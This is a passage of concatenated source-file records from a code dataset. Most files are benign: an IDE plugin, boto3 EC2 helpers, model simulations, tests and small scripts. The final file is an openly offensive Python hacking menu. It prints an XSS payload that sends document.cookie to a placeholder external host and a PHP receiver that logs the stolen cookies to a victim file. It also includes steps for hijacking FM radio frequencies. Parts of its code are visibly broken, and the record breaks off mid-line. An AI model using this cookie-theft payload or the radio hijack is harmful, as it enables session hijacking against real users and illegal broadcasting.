io_stream = Gio.SimpleIOStream.new(stdout, stdin)\n\n if self._client:\n self._client.stop()\n self._client.destroy()\n\n self._client = Ide.LspClient.new(io_stream)\n self.append(self._client)\n self._client.add_language('rust')\n self._client.start()\n self.notify('client')\n\n def _create_launcher(self):\n \"\"\"\n Creates a launcher to be used by the rust service. This needs\n to be run on the host because we do not currently bundle rust\n inside our flatpak.\n\n In the future, we might be able to rely on the runtime for\n the tooling. Maybe even the program if flatpak-builder has\n prebuilt our dependencies.\n \"\"\"\n flags = Gio.SubprocessFlags.STDIN_PIPE | Gio.SubprocessFlags.STDOUT_PIPE\n if not DEV_MODE:\n flags |= Gio.SubprocessFlags.STDERR_SILENCE\n launcher = Ide.SubprocessLauncher()\n launcher.set_flags(flags)\n launcher.set_cwd(GLib.get_home_dir())\n launcher.set_run_on_host(True)\n return launcher\n\n def _discover_sysroot(self):\n \"\"\"\n The Rust Language Server needs to know where the sysroot is of\n the Rust installation we are using. This is simple enough to\n get, by using `rust --print sysroot` as the rust-language-server\n documentation suggests.\n \"\"\"\n for rustc in ['rustc', os.path.expanduser('~/.cargo/bin/rustc')]:\n try:\n launcher = self._create_launcher()\n launcher.push_args([rustc, '--print', 'sysroot'])\n subprocess = launcher.spawn()\n _, stdout, _ = subprocess.communicate_utf8()\n return stdout.strip()\n except:\n pass\n\n @classmethod\n def bind_client(klass, provider):\n \"\"\"\n This helper tracks changes to our client as it might happen when\n our `rls` process has crashed.\n \"\"\"\n context = provider.get_context()\n self = RlsService.from_context(context)\n self._ensure_started()\n self.bind_property('client', provider, 'client', GObject.BindingFlags.SYNC_CREATE)\n\nclass RlsDiagnosticProvider(Ide.LspDiagnosticProvider, Ide.DiagnosticProvider):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsCompletionProvider(Ide.LspCompletionProvider, Ide.CompletionProvider):\n def do_load(self, context):\n RlsService.bind_client(self)\n\n def do_get_priority(self, context):\n # This provider only activates when it is very likely that we\n # want the results. So use high priority (negative is better).\n return -1000\n\nclass RlsRenameProvider(Ide.LspRenameProvider, Ide.RenameProvider):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsSymbolResolver(Ide.LspSymbolResolver, Ide.SymbolResolver):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsHighlighter(Ide.LspHighlighter, Ide.Highlighter):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsFormatter(Ide.LspFormatter, Ide.Formatter):\n def do_load(self):\n RlsService.bind_client(self)\n\nclass RlsHoverProvider(Ide.LspHoverProvider, Ide.HoverProvider):\n def do_prepare(self):\n self.props.category = 'Rust'\n self.props.priority = 200\n RlsService.bind_client(self)\n","repo_name":"acidburn0zzz/gnome-builder","sub_path":"src/plugins/rls/rls_plugin.py","file_name":"rls_plugin.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"21544538572","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nurl = raw_input('type Url:')\r\n#url = 'http://www.meitulu.com/item/8696.html'\r\n#http://www.meitulu.com/item/3499.html\r\nress = requests.get(url)\r\nress.encoding = 'utf-8'\r\nsoup = BeautifulSoup(ress.text,'html.parser')\r\n\r\nfor link in soup.select('a'):\r\n item = 'http://www.meitulu.com/item/'\r\n aa = link.get('href')\r\n if aa[0:28] == item:\r\n ress2 = requests.get(aa)\r\n ress2.encoding = 'utf-8'\r\n soup2 = BeautifulSoup(ress2.text,'html.parser')\r\n #print (soup2)\r\n #soup2 = soup2.find_all('img') \r\n soup2 = soup2.find_all(\"img\",class_=\"content_img\")\r\n for list in soup2: \r\n linkk = list.get('src')\r\n print (linkk)\r\n\r\n\r\n\r\n","repo_name":"zxcke/GetPic","sub_path":"getlist--.py","file_name":"getlist--.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10634035675","text":"from src.mobile.npc.player.player import Player\nfrom src.mobile.npc.mobs.merchant import Merchant\nfrom src.equipment.items import glasses\nfrom src.equipment.weapons import player_knife\n\n\ndef test_init(player):\n assert player.name == \"Vasiliy\"\n\n\ndef test_heal(player):\n player.max_hp = 20\n player.hp = 18\n player.heal()\n assert player.hp == 20\n\n\ndef test_do_showshopitems(world):\n player = world.add(Player('Petya'), (0, 0))\n player.showshopitems()\n assert player.last_happend == 'Petya спросил никого о торгах'\n\n m = world.add(Merchant(), (0, 10)).start_equip()\n player.showshopitems()\n assert player.last_happend == 'Petya спросил никого о торгах'\n\n world.add(Merchant(), (0, 1)).start_equip()\n player.showshopitems()\n assert player.last_happend != 'Petya спросил никого о торгах'\n\n\ndef test_do_share(world):\n p1 = Player('Штирлиц')\n p1_inv_before = p1.inventory\n p1.position = (10, 0)\n p2 = Player('Исаев')\n p2_inv_before = p2.inventory\n p2.position = (0, 0)\n world.players[(0, 0)] = p2\n p1.world = world\n p1.inventory += [glasses()]\n p1.share('Исаев', 'очки')\n assert p1.last_happend == 'Штирлиц слишком далеко от Исаев'\n assert p2.inventory == p2_inv_before\n\n p1.position = (0, 0)\n p1.share('Исаев', 'очки')\n assert p1.last_happend == 'Штирлиц передал очки в руки Исаев'\n assert p2.inventory[-1].name == 'очки'\n assert len(p1.inventory) == len(p1_inv_before)\n\n p1.share('Исаев', 'очки')\n assert p1.last_happend == \"Штирлиц не может дать очки в руки Исаев\"\n\n\ndef test_do_equip(player):\n player.inventory = [player_knife()]\n assert player.equipment['основное'] is None\n player.equip('меч')\n assert player.equipment['основное'].name == 'меч'\n assert player.equipment['основное'].user == player\n","repo_name":"arovesto/underdanger","sub_path":"test/player_test.py","file_name":"player_test.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19918982253","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nplt.style.use('paper')\nimport numpy\n\ndef plot():\n training_seen, train_losses = numpy.genfromtxt('training_results.txt', skip_header = 1, usecols = (0,1)).T\n test_seen, test_losses, acc = numpy.genfromtxt('test_result.txt', skip_header = 1, usecols = (0,1,2)).T\n fig, ax = plt.subplots()\n ax2 = ax.twinx()\n lns1 = ax.plot(training_seen, train_losses, label = 'train losses')\n lns2 = ax.plot(test_seen, test_losses, 'o', label = 'test losses')\n lns3 = ax2.plot(test_seen, acc, 'o-', color = 'C2', label = 'accuracy')\n lns = lns1 + lns2 + lns3\n labs = [l.get_label() for l in lns]\n ax.set_xlabel('Number of samples seen')\n ax.set_ylabel('Loss')\n ax2.set_ylabel('accuracy (%)')\n ax.legend(lns, labs, loc = 'center right')\n fig.savefig('training_result.png', dpi = 600)\n\n\nif __name__ == \"__main__\":\n plot()\n","repo_name":"SamarthSingh2001/LicencePI","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30073253429","text":"name = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\nhandle = open(name)\ncounts = dict()\nfor line in handle :\n if line.startswith(\"From:\") :\n continue\n elif line.startswith(\"From\") :\n words = line.split()\n words = words[5]\n words = words[0:2]\n counts[words] = counts.get(words,0) + 1\n\nfor k,v in sorted(counts.items()) :\n print(k,v)\n","repo_name":"rahamanankit/my-python-codes","sub_path":"tuples1.py","file_name":"tuples1.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71377962293","text":"\nimport matplotlib.pyplot as plt\nimport importlib\nimport numpy as np\nimport pandas as pd\nfrom scipy.signal import find_peaks\nimport sys\nimport seaborn as sns\n\nfrom epstein_civil_violence.agent import Citizen, Cop\nfrom epstein_civil_violence.model import EpsteinCivilViolence\n\nimport time\n\nlegitimacy = \"Global\" # choose between \"Fixed\",\"Global\",\"Local\"\nnetwork = \"Barabasi\" # Choose between \"Barabasi\", \"Renyi\" and Small-world\nmax_iters = 200 # Choose for how many iterations you want the model to run\n\n\nstart = time.time()\nmodel = EpsteinCivilViolence(height=40, \n width=40, \n citizen_density=.7, \n cop_density=0.04, \n citizen_vision=7, \n cop_vision=7, \n legitimacy=.82, \n max_jail_term=30, \n max_iters=max_iters, \n smart_cops = False,\n legitimacy_kind = legitimacy, \n max_fighting_time=1,\n network = network,\n ) \nmodel.run_model()\n\n# Showing the time it takes to run the model\nfinish = time.time()\nprint(\"Time =\",finish-start)\n\n# Getting the data from the data collector\nmodel_out = model.datacollector.get_model_vars_dataframe()\nagent_out = model.datacollector.get_agent_vars_dataframe()\n\n# Shows the amount of active citizens and statistics\nprint(\"Mean amount of active citizens per step = \",model_out[\"Active\"].mean())\nprint(\"Std of amount of active citizens per step = \",model_out[\"Active\"].std())\nprint(\"Maximum of amount of active citizens in a time step = \",model_out[\"Active\"].max())\n\n# line 59 - 78 give back measured properties of the model\npeaks, _ = find_peaks(model_out[\"Active\"], height=50)\nprint(\"Indices of peaks:\", peaks, \"Amount:\", len(peaks))\n\nactives_list = model_out[\"Active\"].to_list()\nfor peak in peaks:\n print(\"Peak of \", actives_list[peak], \"citizens\")\n\npeak_intervals = []\nif len(peaks)>1:\n for i in range(len(peaks)-1):\n peak_intervals.append(peaks[i+1] - peaks[i])\nprint(\"Peak intervals = \",peak_intervals)\n\ntime_between = []\ntime = 0\ntotal_active = 0\n\ncount1, count2 = False, False\nfor i in range(1,len(actives_list)-1):\n if actives_list[i] < 50 and actives_list[i+1] >= 50:\n count1 = False\n time_between.append(time-1)\n time = 0\n if actives_list[i] >= 50 and actives_list[i+1] < 50:\n count1 = True\n if count1 == True:\n time += 1\n\nprint(\"Times of inter-outerbursts\", time_between)\n\n# Makes a plot of the state of the citizens\nax = model_out[[\"Quiescent\",\"Active\", \"Jailed\", \"Fighting\"]].plot()\nax.set_title('Citizen Condition Over Time')\nax.set_xlabel('Step')\nax.set_ylabel('Number of Citizens')\n_ = ax.legend(bbox_to_anchor=(1.35, 1.025))\nplt.tight_layout()\n\nplt.show()\n\n# Makes a plot of perceived legitimacy\nif legitimacy != \"Local\":\n ax = model_out[[\"Legitimacy\"]].plot()\n ax.set_title('Citizen Condition Over Time')\n ax.set_xlabel('Step')\n ax.set_ylabel('Number of Citizens')\n _ = ax.legend(bbox_to_anchor=(1.35, 1.025))\n plt.tight_layout()\n plt.show()\n\n\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1040', axis = 0 ).head())\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1041', axis = 0 ).head())\nprint(agent_out[[\"breed\",\"Legitimacy\"]].filter(like='1042', axis = 0 ).head())\n\nif legitimacy == \"Local\":\n ax = agent_out[\"Legitimacy\"].filter(like='1040', axis = 0 ).plot()\n ax.set_title('Citizen Condition Over Time')\n ax.set_xlabel('Step')\n ax.set_ylabel('Number of Citizens')\n _ = ax.legend(bbox_to_anchor=(1.35, 1.025))\n \n plt.tight_layout()\n plt.show()","repo_name":"DCCdelang/ABM","sub_path":"epstein_civil_violence_Normal+Network Grid/model_run.py","file_name":"model_run.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32015866694","text":"import botocore\r\nimport botocore.exceptions\r\nfrom Logger import Logger\r\nfrom Config import AWS_REGION\r\n\r\n\r\nclass EC2Controller:\r\n # A class for controlling interactions with the boto3 EC2 Resource and Client Interface\r\n\r\n INSTANCES_DISPLAY_FORMAT = ' {0}({1}) \\t {2} - {3} <RegionInfo:{4}> \\t <Launched On:{5}>'\r\n DEVICE_DISPLAY_FORMAT = \"\\t\\t'{}'\\t '{}'\"\r\n MSG_INFO_AMI_CREATED = \"AMI created: {}['{}']\"\r\n MSG_INFO_INSTANCE_CREATED = \"Instance created.{}\"\r\n MSG_INFO_INSTANCE_STARTING = \"Starting instance:'{}'.Please wait..\"\r\n MSG_INFO_INSTANCE_STARTED = \"Instance started:'{}'\"\r\n MSG_INFO_INSTANCE_STOPPING = \"Stopping instance:'{}'.Please wait..\"\r\n MSG_INFO_INSTANCE_STOPPED = \"Instance stopped:'{}'\"\r\n MSG_INFO_RUNNING_INSTANCE = \"Running EC2 Instances: {}\"\r\n MSG_INFO_STOPPED_INSTANCE = \"Stopped EC2 Instances: {}\"\r\n MSG_INFO_STOPPED_RUNNING_INSTANCE = \"Available EC2 Instances: {}\"\r\n MSG_WARN_NO_INSTANCE = \"There is no EC2 Instance at this moment..\"\r\n MSG_WARN_NO_RUNNING_INSTANCE = \"There is no running EC2 Instance at this moment..\"\r\n MSG_WARN_NO_STOPPED_INSTANCE = \"There is no stopped EC2 Instance at this moment..\"\r\n MSG_WARN_NO_INSTANCE_FOR_EMI = \"There is no EC2 Instance for AMI creation at this moment..\"\r\n MSG_INFO_VOL_FROM_SNAP_CREATED = \"Volume created: {0}({1}) \\t {2}-{3} <ZoneInfo:{4}> \\t <Created On:{5}>\"\r\n STR_AWS_INSTANCE = \"<AWS EC2 Instances>\"\r\n STR_ATTACHED_DEVICE = \"\\t\\t<Instance({}) attached block devices Info>\"\r\n\r\n def __init__(self, ec2res, ec2client):\r\n # EC2Controller Constructor, assigns the ec2 Resource \"ec2res\" and \"ec2client\" Client to this controller\r\n self.ec2_res = ec2res\r\n self.ec2_client = ec2client\r\n\r\n def start_instance(self, instance_id):\r\n # Start instance with id 'instance_id'\r\n try:\r\n instance = self.ec2_res.Instance(instance_id)\r\n instance.start()\r\n Logger.info(self.MSG_INFO_INSTANCE_STARTING.format(instance_id))\r\n # Wait for instance start operation to complete\r\n instance.wait_until_running()\r\n Logger.info(self.MSG_INFO_INSTANCE_STARTED.format(instance_id))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def stop_instance(self, instance_id):\r\n # Stop instance with id 'instance_id'\r\n try:\r\n instance = self.ec2_res.Instance(instance_id)\r\n instance.stop()\r\n Logger.info(self.MSG_INFO_INSTANCE_STOPPING.format(instance_id))\r\n # Wait for instance stop operation to complete\r\n instance.wait_until_stopped()\r\n Logger.info(self.MSG_INFO_INSTANCE_STOPPED.format(instance_id))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def list_instances(self):\r\n # List all EC2 instances\r\n return self.list_all_instances(self.ec2_res.instances.all())\r\n\r\n def list_all_instances(self, instances):\r\n count = 0\r\n running_instances = []\r\n pending_instances = []\r\n shutting_down_instances = []\r\n terminated_instances = []\r\n stopping_instances = []\r\n stopped_instances = []\r\n # Loop through all EC2 instances\r\n for instance in instances:\r\n instance_info = [instance.id, instance.state['Name'], instance.image_id, instance.instance_type,\r\n AWS_REGION, instance.launch_time]\r\n if instance.state['Name'] == \"running\":\r\n running_instances.append(instance_info)\r\n elif instance.state['Name'] == \"pending\":\r\n pending_instances.append(instance_info)\r\n elif instance.state['Name'] == \"shutting-down\":\r\n shutting_down_instances.append(instance_info)\r\n elif instance.state['Name'] == \"terminated\":\r\n terminated_instances.append(instance_info)\r\n elif instance.state['Name'] == \"stopping\":\r\n stopping_instances.append(instance_info)\r\n elif instance.state['Name'] == \"stopped\":\r\n stopped_instances.append(instance_info)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_INSTANCE)\r\n else:\r\n Logger.header(self.STR_AWS_INSTANCE)\r\n for running_instance in running_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*running_instance))\r\n for pending_instance in pending_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*pending_instance))\r\n for stopping_instance in stopping_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*stopping_instance))\r\n for stopped_instance in stopped_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*stopped_instance))\r\n for shutting_down_instance in shutting_down_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*shutting_down_instance))\r\n for terminated_instance in terminated_instances:\r\n Logger.info(self.INSTANCES_DISPLAY_FORMAT.format(*terminated_instance))\r\n return count\r\n\r\n def list_running_instance(self):\r\n # List all running EC2 instances\r\n count = 0\r\n running_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"running\":\r\n running_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_RUNNING_INSTANCE)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_RUNNING_INSTANCE.format(running_instances))\r\n return running_instances\r\n\r\n def list_stopped_instance(self):\r\n # List all stopped EC1 instances\r\n count = 0\r\n stopped_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"stopped\":\r\n stopped_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_STOPPED_INSTANCE)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_STOPPED_INSTANCE.format(stopped_instances))\r\n return stopped_instances\r\n\r\n def list_stopped_running_instances(self):\r\n # List all stopped and running EC2 instances\r\n count = 0\r\n available_instances = []\r\n all_instances = self.ec2_res.instances.all()\r\n total_instances = self.list_all_instances(all_instances)\r\n if total_instances > 0:\r\n for instance in all_instances:\r\n if instance.state['Name'] == \"running\" or instance.state['Name'] == \"stopped\":\r\n available_instances.append(instance.id)\r\n count += 1\r\n if count == 0:\r\n Logger.warn(self.MSG_WARN_NO_INSTANCE_FOR_EMI)\r\n else:\r\n Logger.avail_info(self.MSG_INFO_STOPPED_RUNNING_INSTANCE.format(available_instances))\r\n return available_instances\r\n\r\n def instance_attached_block_devices(self, instance_id):\r\n # Any block device mapping entries for the instance\r\n count = 0\r\n instance = self.ec2_res.Instance(instance_id)\r\n attached_block_devices = []\r\n attached_devices_details = []\r\n bdm = instance.block_device_mappings\r\n for device in bdm:\r\n attached_block_devices.append(device['DeviceName'])\r\n ebs = device['Ebs']\r\n device_info = [device['DeviceName'], ebs['VolumeId']]\r\n attached_devices_details.append(device_info)\r\n count += 1\r\n if count > 0:\r\n Logger.header(self.STR_ATTACHED_DEVICE.format(instance_id))\r\n for devices_detail in attached_devices_details:\r\n Logger.sub_info(self.DEVICE_DISPLAY_FORMAT.format(*devices_detail))\r\n return attached_block_devices\r\n\r\n def instance_platform_name(self, instance_id):\r\n # instance platform name\r\n platform = self.ec2_res.Instance(instance_id).platform\r\n return platform\r\n\r\n def instance_state(self, instance_id):\r\n # instance state name\r\n state = self.ec2_res.Instance(instance_id).state['Name']\r\n return state\r\n\r\n def instance_root_device_name(self, instance_id):\r\n # instance root device name\r\n root_device_name = self.ec2_res.Instance(instance_id).root_device_name\r\n return root_device_name\r\n\r\n def create_instance(self, image_id, instance_type):\r\n # create a new EC2 instance with the given AMI Image ID\r\n try:\r\n instance = self.ec2_res.create_instances(ImageId=image_id, MinCount=1, MaxCount=1,\r\n InstanceType=instance_type)\r\n Logger.info(self.MSG_INFO_INSTANCE_CREATED.format(instance))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def create_image(self, instance_id, image_name):\r\n # create a new AMI from the given instance ID\r\n try:\r\n image_id = self.ec2_client.create_image(InstanceId=instance_id, Name=image_name)\r\n Logger.info(self.MSG_INFO_AMI_CREATED.format(image_name, image_id['ImageId']))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n\r\n def create_volume(self, availability_zone, snapshot_id):\r\n # Create a volume from a snapshot\r\n try:\r\n volume = self.ec2_client.create_volume(AvailabilityZone=availability_zone, SnapshotId=snapshot_id)\r\n Logger.info(\r\n self.MSG_INFO_VOL_FROM_SNAP_CREATED.format(volume['VolumeId'], volume['State'], volume['VolumeType'],\r\n str(volume['Size']) + \"GB\",\r\n volume['AvailabilityZone'],\r\n volume['CreateTime']))\r\n except botocore.exceptions.ClientError as error:\r\n Logger.err(str(error))\r\n","repo_name":"GitPointer/AWS_BOTO3_CLI","sub_path":"AWS_Boto3/EC2.py","file_name":"EC2.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"16250174814","text":"# flake8: noqa\nfrom flask import Blueprint, jsonify\n\nfrom currencyexchange.database.fxrates import FxRate\n\nfxrates = Blueprint('fxrates', __name__)\n\n@fxrates.route('/refresh_fx_rates')\ndef refresh_fx_rates():\n count = FxRate.refresh_from_api()\n if count:\n response = dict(status=\"SUCCESS\", count=count)\n else:\n response = dict(status=\"FAILED\", count=None)\n return jsonify(response)\n","repo_name":"jerryshikanga/currency-exchange","sub_path":"currencyexchange/views/fxrates.py","file_name":"fxrates.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19525424570","text":"from sqlalchemy import create_engine, Column, Integer, String, Float\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\n\r\nengine = create_engine(\"postgresql+psycopg2://postgres:admin@localhost/postgres\", echo=False)\r\n\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\nBase = declarative_base()\r\n\r\nclass SQL_Paint(Base):\r\n __tablename__ = \"paint\"\r\n\r\n id = Column(Integer, primary_key=True)\r\n name = Column(String[50])\r\n color = Column(String[50])\r\n type = Column(String[50])\r\n sizes = Column(String[50])\r\n prices = Column(String[50])\r\n area = Column(Float)\r\n\r\nBase.metadata.create_all(engine)\r\n\r\ndef addItemToTable():\r\n paint1 = SQL_Paint(name=\"Dulux\", color=\"White\", type=\"Matt\", sizes=\"2.5/5/10\", prices=\"14/18/22\", area=\"13\")\r\n\r\n session.add(paint1)\r\n\r\n session.commit()\r\n\r\n\r\ndef addItemsManually():\r\n name = input(\"name \")\r\n color = input(\"color \")\r\n type = input(\"paint type \")\r\n sizes = input(\"paint sizes \")\r\n prices = input(\"paint prices \")\r\n area = input(\"area \")\r\n\r\n paint1 = SQL_Paint(name=name, color=color, type=type, sizes=sizes, prices=prices, area=area)\r\n\r\n session.add(paint1)\r\n\r\n session.commit()\r\n\r\ndef readDataOffTable():\r\n paints = session.query(SQL_Paint)\r\n for paint in paints:\r\n print(paint.name)\r\n","repo_name":"thes32/flask_Paint_Can","sub_path":"databaseManager.py","file_name":"databaseManager.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31275613576","text":"from pip import main\r\nfrom pip._internal import main\r\nfrom scapy import *\r\nimport scapy.all as scapy\r\nfrom scapy.layers import http\r\nimport socket\r\nimport threading\r\nimport subprocess\r\nimport os \r\nimport socket\r\nimport random \r\nimport time\r\nfrom subprocess import Popen\r\nfrom subprocess import call\r\nimport requests, os, sys, tempfile, subprocess, base64, time\r\nimport os\r\nimport signal\r\nimport csv\r\nimport speedtest\r\nimport datetime\r\nimport re\r\nimport sys\r\nimport webbrowser\r\n#https://www.youtube.com/watch?v=5-IRImDXjjc EN EL MINUTO 2:21:59 (spoofer snifeer\r\nlog = \"\"\r\ndef GPS():\r\n print(\"datos que debas conocer:frecuencia de onda\")\r\n frecuencia = input(\"ingrese la frecuencia(HZ)>\") \r\n distancia = float((frecuencia)*299708000)\r\n print(\"distancia:\"+distancia+\"metros\")\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#\r\ndef FMhack():\r\n print(\"1 -->> Install\")\r\n print(\"2 -->> Execute\")\r\n tipu = input(\"1 or 2?:\")\r\n if tipu == \"1\":\r\n os.system(\"git clone https://github.com/ChristopheJacquet/PiFmRds.git\")\r\n os.system(\"mv PiFmRds/src/ *\")\r\n os.system(\"make clean\")\r\n os.system(\"make\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 rds.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 waveforms.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 pi_fm_rds.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 fm_mpx.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 control_pipe.c\")\r\n os.system(\"gcc -Wall -std=gnu99 -c -g -03 -march+armv7-a -mtune+arm1176jzf-s -mfloat-ab1=hard -mfpu=vfp -ffast-math -DRASPI=2 mailbox.c\")\r\n os.system(\"gcc -o pi_fm_rds rds.o waveforms.o mailbox.o pi_fm_rds.o gm_mpx.o control_pipe.o -lm -lsndfile\")\r\n os.system(\"clear\")\r\n print(\"monta el arduino en la imagen /hack-radio-frequencies-hijacking-fm-radio-with-raspberry-pi-wire.w1456.jpg/\")\r\n print(\" mas info en https://null-byte.wonderhowto.com/how-to/hack-radio-frequencies-hijacking-fm-radio-with-raspberry-pi-wire-0177007/\")\r\n if tipu == \"2\":\r\n freq = input(\"Frecuency-->>\")\r\n os.system(\"sudo ./pi_fm_rds -freq \"+freq+\" -audio audio.wav\")\r\ndef vulnerability():\r\n print(\"1 -->> Install\")\r\n print(\"2 -->> Execute\")\r\n x = input(\"1 or 2?:\")\r\n if x == \"1\":\r\n os.system(\"git clone https://github.com/infosecsecurity/Spaghetti\")\r\n os.system(\"mv Spaghetti/ *\")\r\n os.system(\"sudo pip install -r doc/requirements.txt\")\r\n if x == \"2\":\r\n os.system(\"python3 spaghetti.py -h\")\r\ndef XSSattack():\r\n console = \"\"\"\r\n\r\n console.log(document.cookie)\r\n console.log(localStorage)\r\n\r\n \"\"\"\r\n exploit = \"\"\"\r\n var xmlHttp = new XMLHttpRequest();\r\n xmlHttp.open(\"GET\", 'https://XXXXXXXXX.com/register.php?cookie='+document.cookie);\r\n xmlHttp.send(null);\r\n \"\"\"\r\n PHP = \"\"\"\r\n <?php\r\n if(isset($_GET[\"cookie\"])){\r\n $file = fopen('victim.txt', 'a');\r\n fwrite($file, $_GET[\"cookie\"].\"\");\r\n fclose($file);\r\n }\r\n \"\"\"\r\n scriptweb = \"\"\"\r\n <script type = ”text / javascript”>\r\n var test = ‘.. / example.php? cookie_data =’ + escape (document.cookie);\r\n </script>\r\n\r\n \"\"\"\r\n print(\"exploit console:\" +exploit+\"\")\r\n print(\"\")#2\r\n print(\"PHP register:\"+PHP+\"\")\r\n print(\"\")#1\r\n print(\"Console:\"+console+\"\")\r\n print(\"\")#3#\r\n print(\"script in the web:\"+scriptweb+\"\")\r\n tipa = input(\"Do you want to install (Y , N or payloads):\")\r\n if tipa == \"Y\":\r\n os.system(\"git clone https://github.com/securityproject/web-app-pentesting\")\r\n os.system(\"mv web-app-pentesting/ *\")\r\n if tipa == \"N\":\r\n os.system(\"sudo python3 brutefxss.py\")\r\n if tipa == \"payloads\":\r\n tipar = input(\"do you want to install?(Y or N):\")\r\n if tipar == \"Y\": \r\n os.system(\"https://github.com/farinap5/webpwn\")\r\n os.system(\"mv webpwn/ *\")\r\n if tipar == \"N\":\r\n print(\" Example:https://iesjuanramonjimenez.org/?s=Frances\")\r\n web = input(\"Print the website:\")\r\n os.system(\"sudo python3 webpwn.py \"+web+ \"\")\r\ndef VPN():\r\n __author__ = \"nil\"\r\n __copyright__ = \"nil\"\r\n __license__ = \"nil\"\r\n __version__ = \"nil\"\r\n __maintainer__ = \"nil\"\r\n __email__ = \"nil\"\r\n\r\n\r\n if len(sys.argv) != 2:\r\n print('usage: ' + sys.argv[0] + ' [country name | country code]')\r\n exit(1)\r\n country = sys.argv[1]\r\n\r\n if len(country) == 2:\r\n i = 6 # short name for country\r\n elif len(country) > 2:\r\n i = 5 # long name for country\r\n else:\r\n print('Country is too short!')\r\n exit(1)\r\n \r\n try:\r\n vpn_data = requests.get('http://www.vpngate.net/api/iphone/').text.replace('\\r','')\r\n servers = [line.split(',') for line in vpn_data.split('\\n')]\r\n labels = servers[1]\r\n labels[0] = labels[0][1:]\r\n servers = [s for s in servers[2:] if len(s) > 1]\r\n except:\r\n print('Cannot get VPN servers data')\r\n exit(1)\r\n \r\n desired = [s for s in servers if country.lower() in s[i].lower()]\r\n found = len(desired)\r\n print('Found ' + str(found) + ' servers for country ' + country)\r\n if found == 0:\r\n exit(1)\r\n \r\n supported = [s for s in desired if len(s[-1]) > 0]\r\n print(str(len(supported)) + ' of these servers support OpenVPN')\r\n # We pick the best servers by score\r\n winner = sorted(supported, key=lambda s: float(s[2].replace(',','.')), reverse=True)[0]\r\n print (\"\\n== Best server ==\")\r\n pairs = zip(labels, winner)[:-1]\r\n for (l, d) in pairs[:4]:\r\n print(l + ': ' + d)\r\n\r\n print(pairs[4][0] + ': ' + str(float(pairs[4][1]) / 10**6) + ' MBps')\r\n print(\"Country: \" + pairs[5][1])\r\n \r\n print (\"\\nLaunching VPN...\")\r\n _, path = 